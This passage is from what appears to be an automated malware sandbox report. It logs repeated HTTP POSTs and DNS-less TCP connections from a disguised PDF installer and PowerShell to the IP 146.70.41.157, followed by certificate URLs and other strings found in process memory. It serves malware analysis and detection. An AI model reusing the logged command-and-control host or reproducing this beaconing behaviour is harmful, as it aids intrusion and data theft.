                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 644
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 713
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 303
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 627
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 674
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 416
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 453
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 567
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 259
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 317
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 636
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 286
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 627
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 480
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 254
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 316
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 375
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 711
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 731
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 631
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 284
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 404
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 611
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 639
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 301
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 728
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 395Connection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 561
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 363
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 259
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 325
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 615
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 423
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 516
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 271
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 471
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 505
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 427
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 513
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 601
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 445
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 719
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 719
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 364
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 425
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 343
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 470
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 745
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 632
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 555
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 706
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 495
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 514
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 326
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 322
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 545
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 310
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 504
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 528
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 634
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 453
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 694
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 678
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 318
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 260
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 278
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 350
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 393
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 672
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 360
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 712
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 277
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 274
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 429
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 581
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 272
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 335
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 385
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 247
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 561
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 569
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 581
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 521
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 479
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 668
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 522
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 410
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 711
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 645
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 531
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 674
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 273
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 623
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 461
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 146.70.41.157Content-Length: 403
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: unknownTCP traffic detected without corresponding DNS query: 146.70.41.157
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmpString found in binary or memory: http://%s:%d;https=https://%s:%dHTTP/1.0Content-Encodingdeflategzip%u.%u.%u.%u01234567890123456789ab
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmpString found in binary or memory: http://%s:%dhttp://schemas.xmlsoap.org/soap/envelope/EnvelopeBodyHeaderFaultfaultcodefaultstringfaul
                        Source: powershell.exe, 00000015.00000002.991996984.00000273C9B50000.00000004.00020000.sdmp, powershell.exe, 00000015.00000002.946342181.00000273B17C0000.00000004.00000001.sdmpString found in binary or memory: http://146.70.41.157
                        Source: powershell.exe, 00000015.00000003.919044923.00000273C99C3000.00000004.00000001.sdmpString found in binary or memory: http://146.70.41.157/
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694464278.0000000004B02000.00000004.00000001.sdmpString found in binary or memory: http://ac.economia.gob.mx/cps.html0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694464278.0000000004B02000.00000004.00000001.sdmpString found in binary or memory: http://ac.economia.gob.mx/last.crl0G
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv1.crl0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv2.crl0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694540995.0000000004ABA000.00000004.00000001.sdmpString found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpString found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpString found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0g
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpString found in binary or memory: http://ca.mtin.es/mtin/crl/MTINAutoridadRaiz03
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpString found in binary or memory: http://ca.mtin.es/mtin/ocsp0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpString found in binary or memory: http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmp, Nyship-Empire-Plan-Gym-Membership.msiString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                        Source: Nyship-Empire-Plan-Gym-Membership.msiString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
                        Source: Nyship-Empire-Plan-Gym-Membership.msiString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmp, Nyship-Empire-Plan-Gym-Membership.msiString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                        Source: Nyship-Empire-Plan-Gym-Membership.msiString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceCodeSigningCA.crt0
                        Source: 5206a8.msi.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                        Source: 5206a8.msi.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpString found in binary or memory: http://certificates.starfieldtech.com/repository/1604
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694491904.0000000004AEA000.00000004.00000001.sdmpString found in binary or memory: http://certs.oati.net/repository/OATICA2.crl0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694491904.0000000004AEA000.00000004.00000001.sdmpString found in binary or memory: http://certs.oati.net/repository/OATICA2.crt0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694491904.0000000004AEA000.00000004.00000001.sdmpString found in binary or memory: http://certs.oaticerts.com/repository/OATICA2.crl
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694491904.0000000004AEA000.00000004.00000001.sdmpString found in binary or memory: http://certs.oaticerts.com/repository/OATICA2.crt08
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694464278.0000000004B02000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694491904.0000000004AEA000.00000004.00000001.sdmpString found in binary or memory: http://cps.siths.se/sithsrootcav1.html0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694668021.0000000004A4A000.00000004.00000001.sdmpString found in binary or memory: http://crl.certigna.fr/certignarootca.crl
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.688584227.0000000004A46000.00000004.00000001.sdmpString found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694464278.0000000004B02000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694486608.0000000004FF1000.00000004.00000001.sdmp, powershell.exe, 00000015.00000002.982583844.00000273C9730000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpString found in binary or memory: http://crl.defence.gov.au/pki0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.688584227.0000000004A46000.00000004.00000001.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694464278.0000000004B02000.00000004.00000001.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694668021.0000000004A4A000.00000004.00000001.sdmpString found in binary or memory: http://crl.dhimyotis.com9
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmp, powershell.exe, 00000015.00000002.939664448.00000273AF6D5000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpString found in binary or memory: http://crl.oces.trust2408.com/oces.crl0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694475221.0000000004AFC000.00000004.00000001.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694491904.0000000004AEA000.00000004.00000001.sdmpString found in binary or memory: http://crl.ssc.lt/root-a/cacrl.crl0
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000003.694491904.0000000004AEA000.00000004.00000001.sdmpString found in binary or memory: